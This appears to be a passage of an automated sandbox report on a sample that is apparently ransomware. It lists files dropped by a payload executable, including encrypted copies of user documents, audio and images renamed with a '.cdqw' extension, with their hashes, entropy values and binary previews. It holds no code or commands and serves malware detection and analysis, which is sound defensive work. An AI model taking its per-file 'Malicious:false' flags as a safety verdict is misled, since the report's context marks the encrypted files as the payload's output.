                                                                                                                                                                      Preview:UMMBD................Ee..>S..1g.p..lm..B..&....Q.cNA..|....{oM.[...U.1.....t..D.Kf.V..0K..2.+.$"....r....Xy3J>>?&....M9......eV... ...W...h.a.[B\.I{n-.-j...6.!.l..Dq.....f..........Uf....et...Ow......gy..e}E....U..Tcc... ...4..e.....5%......d7...[{.i....F.`.D.5_.NX..a.e..L=......8"<.z.s.!.8X..&s..1.2.A:..6..Ko............z.......#.(n...........#......... ..t.F..]0.S....'0&..D.........}.6.En......U...(c.n]1I..D.k~..".......x....|34..`n.4=.NSm.......&'Aw*=........D.VW...%?+..U.}...X..3.yt.......S..e.>V....K.7C..t....c...........E.c..q.E.dI_.g..)...H@.....,aB....H..p.7@.......{............?Q...(..y...@...p%.l.8Qp...wt5.......k./cO.G..2.J..v.....gB.D.T..8.P..".9..k=!a./.....t....O./...)5.J...en!`-...|9P.T.67..4.....;..e..WG.G..N..<`...R..[....IW}....q..K.....B.:...Z..;......*.2k..3............a...y.q...VJ[.....L....0...s.......e....7z...4k...... .~.O.....Y....KV?."...0.W"~...>..H@...\5..i.2.L.O..O.m..f.......|.V3..(.%......\..Y...k...'Y.w.[..b.t..p

                                                                                                                                                                      C:\Users\user\Documents\XZXHAVGRAG\XZXHAVGRAG.docx

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.859488707261582
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:9kLHEO50qAryBwgLo4Y1RCXGolI8SLDthABIAGp6J+fpdXO5jniL9bo2bD:9kLHl50qda540RCXG4AZy+fpdXORnAD
                                                                                                                                                                      MD5:2D4D62CE503CA69FD2C3698DA784FD05
                                                                                                                                                                      SHA1:B9D7F3CBA53BAE5B884813BFB4E440D5001FC8D1
                                                                                                                                                                      SHA-256:755AAE108A7FBEA5FBF72EAC082F8C16F5551D8436B286B5B1DF8BAB1C82BFA0
                                                                                                                                                                      SHA-512:2ADBB14BC87249BDF7F0C75E74062835A5A12CE0184CB64AEFE0B2E72BF328D1AE6FF4DBA09EC0E45434F8A49CB9F441328D46242705E73350DDC02B39A9E9E9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:XZXHA..S..`&4..V|...s.E....Cu.R$.=j...%.x..J......g..L..T...ZY.c#..1..H...2.n..L.*..>.$.@g[..o.!..WW#DW..K.K...._..........c..[.>9..$.&.1..K.9.......@........N.`..F....z.G@...az..:..>e..J..5[..W.....T..........X..t..y.`.KxMN..3&lZ.z........+..v..4P".....ZB.(+m.i...=.u%68W[.....Z...l.o_a...W....t..M!Ag.i.Ur......:2V%Qg7......w.Z.._./%...!ZI....b...^.*........&..+i.t.m....|_.^.e..........R......]P.].C5h-~....6...p.d....D..>D..<)..w.;.2.-..?..MP..u.*&.?."..8...5..A|.....p#.\Q.MPJ.OQB/...{M.....u/.=..;.8..k.......&v..1...=..:.&Uq..~..~..Mg.Y...;.....Z....av.x:z.*Z.Nt......o.VL..uV...l.........A..?.....x....)..F..........]. '.. ?...Ko.....uRJ..86..]%q.......z_...!...+..)...M...n.:..}...R.3.0.Mh.SqD;..Z.t-.......-.....#L.5...4.s.5.7R..%-f8}^.L.j7.`.t......|.`.,..=<&.?%...]5...E.2.n....]..i5c<S:.Hh....i.5..D...`.,~).qT..o.iP......^..y.^.........Z0H...s..)..?.Q..\.b....I...$OO.}^C..J.qr;qus...T.C...@2.`.qrV..Y...8..!..sM....w....b. 0...fV.U...

                                                                                                                                                                      C:\Users\user\Documents\XZXHAVGRAG\XZXHAVGRAG.docx.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.859488707261582
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:9kLHEO50qAryBwgLo4Y1RCXGolI8SLDthABIAGp6J+fpdXO5jniL9bo2bD:9kLHl50qda540RCXG4AZy+fpdXORnAD
                                                                                                                                                                      MD5:2D4D62CE503CA69FD2C3698DA784FD05
                                                                                                                                                                      SHA1:B9D7F3CBA53BAE5B884813BFB4E440D5001FC8D1
                                                                                                                                                                      SHA-256:755AAE108A7FBEA5FBF72EAC082F8C16F5551D8436B286B5B1DF8BAB1C82BFA0
                                                                                                                                                                      SHA-512:2ADBB14BC87249BDF7F0C75E74062835A5A12CE0184CB64AEFE0B2E72BF328D1AE6FF4DBA09EC0E45434F8A49CB9F441328D46242705E73350DDC02B39A9E9E9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:XZXHA..S..`&4..V|...s.E....Cu.R$.=j...%.x..J......g..L..T...ZY.c#..1..H...2.n..L.*..>.$.@g[..o.!..WW#DW..K.K...._..........c..[.>9..$.&.1..K.9.......@........N.`..F....z.G@...az..:..>e..J..5[..W.....T..........X..t..y.`.KxMN..3&lZ.z........+..v..4P".....ZB.(+m.i...=.u%68W[.....Z...l.o_a...W....t..M!Ag.i.Ur......:2V%Qg7......w.Z.._./%...!ZI....b...^.*........&..+i.t.m....|_.^.e..........R......]P.].C5h-~....6...p.d....D..>D..<)..w.;.2.-..?..MP..u.*&.?."..8...5..A|.....p#.\Q.MPJ.OQB/...{M.....u/.=..;.8..k.......&v..1...=..:.&Uq..~..~..Mg.Y...;.....Z....av.x:z.*Z.Nt......o.VL..uV...l.........A..?.....x....)..F..........]. '.. ?...Ko.....uRJ..86..]%q.......z_...!...+..)...M...n.:..}...R.3.0.Mh.SqD;..Z.t-.......-.....#L.5...4.s.5.7R..%-f8}^.L.j7.`.t......|.`.,..=<&.?%...]5...E.2.n....]..i5c<S:.Hh....i.5..D...`.,~).qT..o.iP......^..y.^.........Z0H...s..)..?.Q..\.b....I...$OO.}^C..J.qr;qus...T.C...@2.`.qrV..Y...8..!..sM....w....b. 0...fV.U...

                                                                                                                                                                      C:\Users\user\Downloads\HTAGVDFUIE.mp3

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.86829610025446
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:bOWMQoY2JMrF801yp81lUCdqgSdI2VIGb7Kee6UPzCkj3uLnXWFbHuRUymla5c4w:bOWMjB2rFO5CdqrdI2Vve6UPzCe3uLno
                                                                                                                                                                      MD5:9E1BFF009BA4E3214EE2C7C77E3F5CDA
                                                                                                                                                                      SHA1:6285CC902D6948F260D159E736941B05F9FABEF3
                                                                                                                                                                      SHA-256:DDD19D3B193713B3D51552F55A3ABDAD7C75E1E04ED66081552EE0077702B382
                                                                                                                                                                      SHA-512:0723AF58ECE9C95F1175141DAA15EB08F70C0967ADF46375287DC5CC6B4C1EB01F9613DA8ED959DFF86DDE7833CF09AE11494586FEDC25C4807C46083AD0EDCE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:HTAGV.).d..wa o.8.H#.<._Pj. .~...NTC.%i{.v.dz........l}......#..b..b..dN...,..........~...(..l......<_.&......u...[.Hs.......R%3.>'.Z{.As.f......I.?.R...\..U.._.......&.FC....b.s.;.yv>\fa.[\,B[u..)>.L..L....j..,`h.%......F#......\.TXQ."-.[w..j.....O`.z3T.....>Pp......nqw.9.TP.....xL..!... ..u#.h..F.*{.M.n..|..M..;.4b....0.'...S.=T.r...Z...@Jp..hCLT..R. .....+.@.Z..E^.x.....2...*.....{..2.N.At....e8.~....4}..I...M.......Z.):.$.t..re%.....0i?....1...x.,,...%...mi;.......4m.....-.a.....]79$ ..e...? ......._..PK]k/..zo...m]3.y.j."I9.....TQ9...c...(..,.7<.5^./..n.n...^&z.t.x.=7...b.e..G...V..K[V.F...+W..S.b...U......#.7....C.?=...#_2...<..n.Bly..........w3~.|h.......K..7...e...........u.....P./>2g..n.p...:<;....%].Y./.......}_.....y....[Q0.E(,o.0O..K<.......re......;K..b...`.I.w....YswA.i=...j..e..Q.,*..c..%.d.=..#......Ad.PNk.)OM.(..u3.k..T.R..|.gCP......Y......>.z..<.3......[21..!....]I.)....o..N7...,..{...eR.0J8..-..#h...Dr..4..E a.....

                                                                                                                                                                      C:\Users\user\Downloads\HTAGVDFUIE.mp3.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.86829610025446
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:bOWMQoY2JMrF801yp81lUCdqgSdI2VIGb7Kee6UPzCkj3uLnXWFbHuRUymla5c4w:bOWMjB2rFO5CdqrdI2Vve6UPzCe3uLno
                                                                                                                                                                      MD5:9E1BFF009BA4E3214EE2C7C77E3F5CDA
                                                                                                                                                                      SHA1:6285CC902D6948F260D159E736941B05F9FABEF3
                                                                                                                                                                      SHA-256:DDD19D3B193713B3D51552F55A3ABDAD7C75E1E04ED66081552EE0077702B382
                                                                                                                                                                      SHA-512:0723AF58ECE9C95F1175141DAA15EB08F70C0967ADF46375287DC5CC6B4C1EB01F9613DA8ED959DFF86DDE7833CF09AE11494586FEDC25C4807C46083AD0EDCE
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:HTAGV.).d..wa o.8.H#.<._Pj. .~...NTC.%i{.v.dz........l}......#..b..b..dN...,..........~...(..l......<_.&......u...[.Hs.......R%3.>'.Z{.As.f......I.?.R...\..U.._.......&.FC....b.s.;.yv>\fa.[\,B[u..)>.L..L....j..,`h.%......F#......\.TXQ."-.[w..j.....O`.z3T.....>Pp......nqw.9.TP.....xL..!... ..u#.h..F.*{.M.n..|..M..;.4b....0.'...S.=T.r...Z...@Jp..hCLT..R. .....+.@.Z..E^.x.....2...*.....{..2.N.At....e8.~....4}..I...M.......Z.):.$.t..re%.....0i?....1...x.,,...%...mi;.......4m.....-.a.....]79$ ..e...? ......._..PK]k/..zo...m]3.y.j."I9.....TQ9...c...(..,.7<.5^./..n.n...^&z.t.x.=7...b.e..G...V..K[V.F...+W..S.b...U......#.7....C.?=...#_2...<..n.Bly..........w3~.|h.......K..7...e...........u.....P./>2g..n.p...:<;....%].Y./.......}_.....y....[Q0.E(,o.0O..K<.......re......;K..b...`.I.w....YswA.i=...j..e..Q.,*..c..%.d.=..#......Ad.PNk.)OM.(..u3.k..T.R..|.gCP......Y......>.z..<.3......[21..!....]I.)....o..N7...,..{...eR.0J8..-..#h...Dr..4..E a.....

                                                                                                                                                                      C:\Users\user\Downloads\KATAXZVCPS.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.865929145576379
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:GlbaDTT4O7q1rk1X5SXtuAKjX5oGR4t9gY1IfRyFSRJl/7tYnDYSy4erXdfWQ2Pw:GlbaXTp7grk1pYJGX5oGOt6Y1YRySp/x
                                                                                                                                                                      MD5:D7F407E267313135436B5971E440FB59
                                                                                                                                                                      SHA1:0B7CA1766E0BE9D5632D2E853459EA33E2FFADC2
                                                                                                                                                                      SHA-256:C971C338BE6390AC5CA721176108A84167D7548571CD855779F6A89612781D34
                                                                                                                                                                      SHA-512:3B64C49D6B3F34F891D1CC5081DB4130C5500383DFF36841F0436A0CDAC7E392BBBA6DBBADF988A58EFA02768236BE75C575EB5311A6589D07F81B9733519BB5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KATAX...K._.C...<shq@...c...F........~^..8.....^!.%:y.(....@...z.......@....?..Y...O3....B.!.x>..q|Vd.C..p..v.. ........c=...Q.c.A`.O...?U...P..$.k.8.#.{.zW...J.<I.....:bO7.KQ...[........%\Fd.}.i.....-@..^..`").'.V.....Y.l.3....Q&.. _s..*.H._2....h=vL.+.:jI....J...(.yO.*..o.2.....y.p3....*.1.P.`...?..LE.u[.b...M.>x...n (.qsN...q..G[...Og...,7.iO.$i.F..9]..EA.Q+)..1^_1......q..}..w.W....[I~B.P.e.D5.V.=V..&..z@.U...M...Z.Pt...ST..G'4.:..9.C....-..o..QSJ.....0.'...4....$c./,.5.D..%@..f.}..;{..?....-.....?..2.w.\\.....hjVP..bm..=........H.M#..EA_J..I.....nG>.e:..he8 .....fN..Mq...I.2..K..a.....}.........\.....%$...N.l...]...Hr}.q...=...du.m.$.......l._..C..!!RY...>.z..t......=N.,fCe.L..z$........s..o.s.v..)...H*d...c.y..Y5g.t.75.j..A.....N.M....p.?j......`=.k.N.dZ..l.l....jx..w...w.;3..t.k@5.8T1{.v...p3.G.x%.7.`..:8../t.M8.z_.&.},1..P.H..^.aS.`.....Xv.u..}....#u^.qe..p.,...U..Lh.%.E..v..l.I....B.5O..o...s..."m..Uf../........B.2.<.YC...

                                                                                                                                                                      C:\Users\user\Downloads\KATAXZVCPS.png.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.865929145576379
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:GlbaDTT4O7q1rk1X5SXtuAKjX5oGR4t9gY1IfRyFSRJl/7tYnDYSy4erXdfWQ2Pw:GlbaXTp7grk1pYJGX5oGOt6Y1YRySp/x
                                                                                                                                                                      MD5:D7F407E267313135436B5971E440FB59
                                                                                                                                                                      SHA1:0B7CA1766E0BE9D5632D2E853459EA33E2FFADC2
                                                                                                                                                                      SHA-256:C971C338BE6390AC5CA721176108A84167D7548571CD855779F6A89612781D34
                                                                                                                                                                      SHA-512:3B64C49D6B3F34F891D1CC5081DB4130C5500383DFF36841F0436A0CDAC7E392BBBA6DBBADF988A58EFA02768236BE75C575EB5311A6589D07F81B9733519BB5
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KATAX...K._.C...<shq@...c...F........~^..8.....^!.%:y.(....@...z.......@....?..Y...O3....B.!.x>..q|Vd.C..p..v.. ........c=...Q.c.A`.O...?U...P..$.k.8.#.{.zW...J.<I.....:bO7.KQ...[........%\Fd.}.i.....-@..^..`").'.V.....Y.l.3....Q&.. _s..*.H._2....h=vL.+.:jI....J...(.yO.*..o.2.....y.p3....*.1.P.`...?..LE.u[.b...M.>x...n (.qsN...q..G[...Og...,7.iO.$i.F..9]..EA.Q+)..1^_1......q..}..w.W....[I~B.P.e.D5.V.=V..&..z@.U...M...Z.Pt...ST..G'4.:..9.C....-..o..QSJ.....0.'...4....$c./,.5.D..%@..f.}..;{..?....-.....?..2.w.\\.....hjVP..bm..=........H.M#..EA_J..I.....nG>.e:..he8 .....fN..Mq...I.2..K..a.....}.........\.....%$...N.l...]...Hr}.q...=...du.m.$.......l._..C..!!RY...>.z..t......=N.,fCe.L..z$........s..o.s.v..)...H*d...c.y..Y5g.t.75.j..A.....N.M....p.?j......`=.k.N.dZ..l.l....jx..w...w.;3..t.k@5.8T1{.v...p3.G.x%.7.`..:8../t.M8.z_.&.},1..P.H..^.aS.`.....Xv.u..}....#u^.qe..p.,...U..Lh.%.E..v..l.I....B.5O..o...s..."m..Uf../........B.2.<.YC...

                                                                                                                                                                      C:\Users\user\Downloads\KZWFNRXYKI.mp3

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.832395164019141
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:DLBe3b6JDGXZsmvVr19JX0lKLLAvSeROqd6NefgjizDafj9djANOGzkZhi6PIVjp:D43LRrnDoDROgYOvK9djAjkZhi6gVtD
                                                                                                                                                                      MD5:49BE52727D8C8892CA2C2C508E87AB05
                                                                                                                                                                      SHA1:C2A12271CA407DBF5E8AF9FBD65354DB42F745BA
                                                                                                                                                                      SHA-256:49EAE0419D4F5C84C71646A8FE3F63A1E15CE0B9950E9D99433791595CB1DA82
                                                                                                                                                                      SHA-512:33629D15AFD836DDDF4328174AA2262AE1908EC714CE440222A60146CC1468F664BCA8E8C37D8BCDDE318C69024C4653F7FBDE5D1A83E12864E07FE6D516C9A9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KZWFN.=.2H.......L.........dS.......p.....,.....3..su.t(...3...0..,.c`.B..9....C.2.|.|G.J..].OC...3M.O.z.4..z:..x1O........a...=........W..".i../...KU._C...wG.Sh\;.... ..v...8.A.5(...j..L..#c:+..G.B.|xb...,j=.W..U.i..C ..|.U.)....h..[.}...q.SM.5....jU.Ogu...*.^.."..].7.v....;.#..a:3....1...B.H3...e[Q....\.O#..`...+....:............SL......c...P.H.O69...x%...?c..A3;.!5...ih.Z......>._...dac0..x}.K........fs.aD .O...@.......&F..{.`.3.....+q.H}........,1...9C..o..6d........`p.X.......K<.D.:.....K.....a..2....)..$r@o.......C..$..M....a.p_=.?...r..=.Qv4..g,B....$.......H$.9-...!.]._..?e.Z.-....g&.%.2..=...H2..g0...\...E~..`.D...b.ui.Q.>wQ.5.A..;....}]K....?..B.92WF>..HS.u. @<{..&..x~Q1.}.GE.^.j.....1..$rG(....J]p.U.ngM..A.)M..fk........2v.$.=..M4.D......DGQ...;..>L...X..v2....=,.Z._.c(.n.j....Z.."..j#(S&....b..*......-..;..g....5 .p.b.F... .......4.p...Z.F...R......Q-.xi..H.K..:.E.3m_.a..@O..W.C}4.K.ws.[..g;....3.....W..W..)....2o^..."...\.m.. y

                                                                                                                                                                      C:\Users\user\Downloads\KZWFNRXYKI.mp3.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.832395164019141
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:DLBe3b6JDGXZsmvVr19JX0lKLLAvSeROqd6NefgjizDafj9djANOGzkZhi6PIVjp:D43LRrnDoDROgYOvK9djAjkZhi6gVtD
                                                                                                                                                                      MD5:49BE52727D8C8892CA2C2C508E87AB05
                                                                                                                                                                      SHA1:C2A12271CA407DBF5E8AF9FBD65354DB42F745BA
                                                                                                                                                                      SHA-256:49EAE0419D4F5C84C71646A8FE3F63A1E15CE0B9950E9D99433791595CB1DA82
                                                                                                                                                                      SHA-512:33629D15AFD836DDDF4328174AA2262AE1908EC714CE440222A60146CC1468F664BCA8E8C37D8BCDDE318C69024C4653F7FBDE5D1A83E12864E07FE6D516C9A9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:KZWFN.=.2H.......L.........dS.......p.....,.....3..su.t(...3...0..,.c`.B..9....C.2.|.|G.J..].OC...3M.O.z.4..z:..x1O........a...=........W..".i../...KU._C...wG.Sh\;.... ..v...8.A.5(...j..L..#c:+..G.B.|xb...,j=.W..U.i..C ..|.U.)....h..[.}...q.SM.5....jU.Ogu...*.^.."..].7.v....;.#..a:3....1...B.H3...e[Q....\.O#..`...+....:............SL......c...P.H.O69...x%...?c..A3;.!5...ih.Z......>._...dac0..x}.K........fs.aD .O...@.......&F..{.`.3.....+q.H}........,1...9C..o..6d........`p.X.......K<.D.:.....K.....a..2....)..$r@o.......C..$..M....a.p_=.?...r..=.Qv4..g,B....$.......H$.9-...!.]._..?e.Z.-....g&.%.2..=...H2..g0...\...E~..`.D...b.ui.Q.>wQ.5.A..;....}]K....?..B.92WF>..HS.u. @<{..&..x~Q1.}.GE.^.j.....1..$rG(....J]p.U.ngM..A.)M..fk........2v.$.=..M4.D......DGQ...;..>L...X..v2....=,.Z._.c(.n.j....Z.."..j#(S&....b..*......-..;..g....5 .p.b.F... .......4.p...Z.F...R......Q-.xi..H.K..:.E.3m_.a..@O..W.C}4.K.ws.[..g;....3.....W..W..)....2o^..."...\.m.. y

                                                                                                                                                                      C:\Users\user\Downloads\LTKMYBSEYZ.jpg

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.8361316868989155
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:oqRDa5HBvgI+SbPDgGc6ejq2HZZWUGqyGNYn9DJ3nUkrQOMAtq0xqt3HPTN5Lvxi:FDEdgIhElOMa1GSRJ3n/rQvw8VPZL7TK
                                                                                                                                                                      MD5:8C5D1118EC95FD1FE0E4EDC895FC206E
                                                                                                                                                                      SHA1:AE9896A7217364E73688316D8A39B87B6E2D0453
                                                                                                                                                                      SHA-256:AAB3190979D8816B002E72127899F8C26EC14DB21C79DCB0B1FB42AA728ACF5C
                                                                                                                                                                      SHA-512:6D28B864D88EDB19612A3CD2107F0B6DBDCD3EF4CD3542969826D5EC42D6D9B6D45BD716ADB51B970B620E25F06572625AE5363DA01224DB426AFEC4CD41539C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:LTKMY.bg.+y..w..o...4.V.5....J@.7.e.....j.+el.h....f.c......LeB%..X..cR0a>.q.3..7......[.v.......SM30.......T....{..za........X{J.s.'.kO;....a.'....R.2.v.......]w...:,<.9.......3...\...*.@....kb..c.H9.8.Oyq...O....H........#.~..C.xs.@..D..cX[.j....A......f.P.?..$......H...7LtX.:.G..:w8.1..N..................%...#Dt..........x......8c._?/.......>G...l.e.S=..~?...M.J.P....K..?.K..t.......b.*.....~..|y...l%....'.6......G[#..n....Z..yU...is..........Mt!x)..#... y|.p8._s.P.....?.i/....X.4...z.~....-.Fv!d.F.. ..Q.$.I..Y.QB.F.....B..Z....(.".Q.F..i.....".z...5 .d-ai.z.j_...I......0..Nc..Y,..*P...,(*F.c}.U'8..?.q.....H..\.o..1`$3..#....6Y...~....2$i..8..[...ws.qr[.Hk....[....9..{L....X|A<....&..g...V...Z..1.x(u...;.q.j.....A..I.$.u..&...IN.....e..#.2..R..8.;....i4.v.PQy.q%.6...?...X.L...M%....".n..G.....Sf..>..}.`O.L.."..mFC.V%..1;.....x......1...DRt.}\IkN..nql....W}Q+.UO@..@..,5....O..@.[,.=.9..[.$Wq#..@.Z...T.|......z.+.MFG.G.Kf....~WR.'..vm.F%.i.

                                                                                                                                                                      C:\Users\user\Downloads\LTKMYBSEYZ.jpg.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.8361316868989155
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:oqRDa5HBvgI+SbPDgGc6ejq2HZZWUGqyGNYn9DJ3nUkrQOMAtq0xqt3HPTN5Lvxi:FDEdgIhElOMa1GSRJ3n/rQvw8VPZL7TK
                                                                                                                                                                      MD5:8C5D1118EC95FD1FE0E4EDC895FC206E
                                                                                                                                                                      SHA1:AE9896A7217364E73688316D8A39B87B6E2D0453
                                                                                                                                                                      SHA-256:AAB3190979D8816B002E72127899F8C26EC14DB21C79DCB0B1FB42AA728ACF5C
                                                                                                                                                                      SHA-512:6D28B864D88EDB19612A3CD2107F0B6DBDCD3EF4CD3542969826D5EC42D6D9B6D45BD716ADB51B970B620E25F06572625AE5363DA01224DB426AFEC4CD41539C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:LTKMY.bg.+y..w..o...4.V.5....J@.7.e.....j.+el.h....f.c......LeB%..X..cR0a>.q.3..7......[.v.......SM30.......T....{..za........X{J.s.'.kO;....a.'....R.2.v.......]w...:,<.9.......3...\...*.@....kb..c.H9.8.Oyq...O....H........#.~..C.xs.@..D..cX[.j....A......f.P.?..$......H...7LtX.:.G..:w8.1..N..................%...#Dt..........x......8c._?/.......>G...l.e.S=..~?...M.J.P....K..?.K..t.......b.*.....~..|y...l%....'.6......G[#..n....Z..yU...is..........Mt!x)..#... y|.p8._s.P.....?.i/....X.4...z.~....-.Fv!d.F.. ..Q.$.I..Y.QB.F.....B..Z....(.".Q.F..i.....".z...5 .d-ai.z.j_...I......0..Nc..Y,..*P...,(*F.c}.U'8..?.q.....H..\.o..1`$3..#....6Y...~....2$i..8..[...ws.qr[.Hk....[....9..{L....X|A<....&..g...V...Z..1.x(u...;.q.j.....A..I.$.u..&...IN.....e..#.2..R..8.;....i4.v.PQy.q%.6...?...X.L...M%....".n..G.....Sf..>..}.`O.L.."..mFC.V%..1;.....x......1...DRt.}\IkN..nql....W}Q+.UO@..@..,5....O..@.[,.=.9..[.$Wq#..@.Z...T.|......z.+.MFG.G.Kf....~WR.'..vm.F%.i.

                                                                                                                                                                      C:\Users\user\Downloads\NIKHQAIQAU.png

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
                                                                                                                                                                      Entropy (8bit):7.859478581840915
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:3m1ikU3hT3Zmo1dl4hxuSXWzY38RCHkYXpFuWT2d3LE2dPPgQUg2bD:3EikINZRKxX8R9YdTMbEzQYD
                                                                                                                                                                      MD5:F5290687650E3AE616263E1AA4FAD2BE
                                                                                                                                                                      SHA1:A73DAEEC1E69B334AEFC59010EE731708C769817
                                                                                                                                                                      SHA-256:31CEDB613BEAC7C586DD6B43413D11641594635541FA561A5EC39DC5E3742412
                                                                                                                                                                      SHA-512:957A56E59D9429300A3D2C254E18700C9DF15AD8E9451B3DC70EFCC1DCAF1EEFD0D66C5A8DA3BD905AF174820C1A67B6335DE9F45C8BC491EFFB1546D9ECD925
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:NIKHQ!..X.$..c'.J:H....$...A..u..0........Fo.Q..:U.DK .?I.#.i.Kj.. .d......"h..U"J....O......:.oA.5....G'...uM).v..h.~c .....7./.......m\"...J.hl...H..C...V.d."4j.J..U..h<..+Ir.#.|vj2..!8.%5...4..`.$.~.]...%.....W.V.=p.!g...aF....rZ+.@..>...Q.\..Hh.$....LY...P..c.-Y..\..&.*..}....G"..b..|...-..<`...%.%...."..:.4........uz3vt.r%^.?....5^O.@D.6g...._......i.pG..(.gbj@O.g%y..u..4.{947f....@..Os.]....1}#^N.N.).E)...A..._..R.m;...b.....g;..^..9....@..".~9.....J.s;q..$...."_nzi.}....Ud.H.....,r....H.a..:...X.CP#k.....@........NL<N...D)....U.j......T.........I_.^...R..........f..:\.0.I@.m.M....V.L.`..2.w.)....J...=...Q..^.. .%..A]:..~...j[...S....Gu...z.^..Y....~.IY..............m.w.....v....L.Tpx.~....;.w.1..~R.9.....FG..:.I. .U..Kg.oj^.yb...H...w..)h.V..,.{.....:".....O;..V_^..#..-I..C`..m....Ce..a..<.1.,"Y@.0..p....P........J.j..3K..Y.>.:M.b.1.k..5.%.FE.............t.k..4=/.f.c.R.^.Pv|!.f......5*...hWm.)./tfH51sc.IT1......p...K:.7

                                                                                                                                                                      C:\Users\user\Downloads\NIKHQAIQAU.png.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\AppData\Local\a59eb08a-a827-4835-802e-c9638c259365\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1360
